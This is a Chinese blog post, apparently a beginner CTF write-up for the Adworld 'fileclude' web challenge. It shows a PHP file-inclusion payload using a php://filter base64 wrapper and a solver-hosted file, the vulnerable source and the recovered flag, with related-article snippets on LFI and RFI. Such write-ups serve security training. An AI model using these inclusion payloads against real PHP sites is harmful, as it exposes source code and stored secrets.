攻防世界-adworld-fileclude-新手

最新推荐文章于 2024-06-16 10:23:07 发布
最新推荐文章于 2024-06-16 10:23:07 发布
阅读量673 收藏
点赞数
分类专栏: 作业 web 攻防世界CTF 文章标签: php CTF ctf web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47210241/article/details/127952766
版权
攻防世界CTF 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
web
18 篇文章 1 订阅
订阅专栏
作业
9 篇文章 0 订阅
订阅专栏

攻防世界-adworld-fileclude-新手

34最佳Writeup由 Haojie 提供WriteUP

收藏

反馈

难度:1

方向:Web

题解数:13

解出人数:2346

题目来源: CTF

题目描述:

好多file呀!

题目场景:

http://61.147.171.105:60895

100%

倒计时: 35927

image-20221120170602497

image-20221120191931378

┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/fileinclude]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.10.140 - - [20/Nov/2022 17:18:39] "GET / HTTP/1.1" 200 -

image-20221120192102839

http://61.147.171.105:60895/??file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://127.0.0.1:5555/file2.php

image-20221120192454128

GET /?file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://x.x.x.x:5555/file2.php HTTP/1.1
Host: 61.147.171.105:60895
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0



HTTP/1.1 200 OK
Date: Sun, 20 Nov 2022 10:16:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.23
Vary: Accept-Encoding
Content-Length: 2529
Connection: close
Content-Type: text/html

WRONG WAY!<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br /></span><span style="color: #007700">include(</span><span style="color: #DD0000">"flag.php"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file1"</span><span style="color: #007700">])&nbsp;&amp;&amp;&nbsp;isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file2"</span><span style="color: #007700">]))<br />{<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$file1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file1"</span><span style="color: #007700">];<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$file2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file2"</span><span style="color: #007700">];<br />&nbsp;&nbsp;&nbsp;&nbsp;if(!empty(</span><span style="color: #0000BB">$file1</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;!empty(</span><span style="color: #0000BB">$file2</span><span style="color: #007700">))<br />&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$file2</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #DD0000">"hello&nbsp;ctf"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include(</span><span style="color: #0000BB">$file1</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(</span><span style="color: #DD0000">"NONONO"</span><span style="color: #007700">);<br />}</span>
</span>
</code>PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXtmYjJhN2M1OWFjMmFkYzI2MjNmYmQwYjEwMjIxODgzNX0=

image-20221120191728484

// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}

 <?php
echo "WRONG WAY!";
// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}

image-20221120191823018

32进制
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF攻防世界 fileclude 解题详析(php伪协议)
等风来
07-31 4517
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
攻防世界file_include
小缪的博客
06-10 2872
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界web新手fileinclude&fileclude
最新发布
qq_52481261的博客
06-16 921
我们要学会使用各种文件包含命令,并且在做题过程中不断积累自己的poc。
攻防世界---fileclude
m0_72447684的博客
10-11 1278
攻防世界---fileclude
攻防世界fileclude
m0_73303597的博客
11-07 1776
自用
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
攻防世界 web进阶区 filemanger
m0_51395584的博客
06-14 1018
攻防世界 filemanger 文件上传 木马后门
Fileclude
淡巴枯的博客
09-20 981
判断url中get方式的file1和file2是否存在(isset),如果存在,再判断file1和file2是否为空(empty),如果不为空,再判断file2里面是否有“hello ctf”。这里需要用到hackbar插件,详见。传输的数据是:hello ctf。此处命令直接在URL中输入即可。题目描述:好多file呀!得到一串base64编码。得到一串base64编码。
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界】网络安全学习180天之 fileclude NO.GFSJ1010
Bing_Geng的博客
11-26 140
首先考察了,其次考察了data://
攻防世界 web篇(一)
weixin_51387754的博客
09-08 1695
攻防世界 是一群信息安全大咖共同研究的答题、竞赛、以游戏方式结合的一款新型学习平台,融入多种场景在线题型,集实战、理论、趣味于一体。
[转]File类详解及其用法
Fight for MyLife
11-25 136
File类常用方法 、File类常用方法   File类中包含了很多获得文件或文件夹属性的方法,使用起来比较方便,下面将常见的方法介绍如下:   a、createNewFile方法   public boolean createNewFile() throws IOException   该方法的作用是创建指定的文件。该方法只能用于创建文件,不能用于创建文件夹,且文件路径中包含的文件夹...
攻防世界WEB练习-fileclude
墨鱼菜鸡
09-10 3763
目录 题目场景 分析代码 解决思路 ​编辑 base64解码 找到flag 题目场景 分析代码 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET["file1"])&&isset($_GET["file2"])) { ...
攻防世界PWN之secret_file题解
seaaseesa的博客
11-10 1906
首先,我们看一下程序的保护机制 吓了一跳,几个关键保护全开。 然后,我们用IDA分析一下 好像很复杂的样子。以往的ROP这些都用不了。然而,只要这个条件成立,就可以执行popen了。 其中,我们发现v15是一个定值,在这里面被初始化,调试后发现是一个字符串9387a00e31e413c55af9c08c69cd119ab4685ef3bc8bcbe1cf82161119457127...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值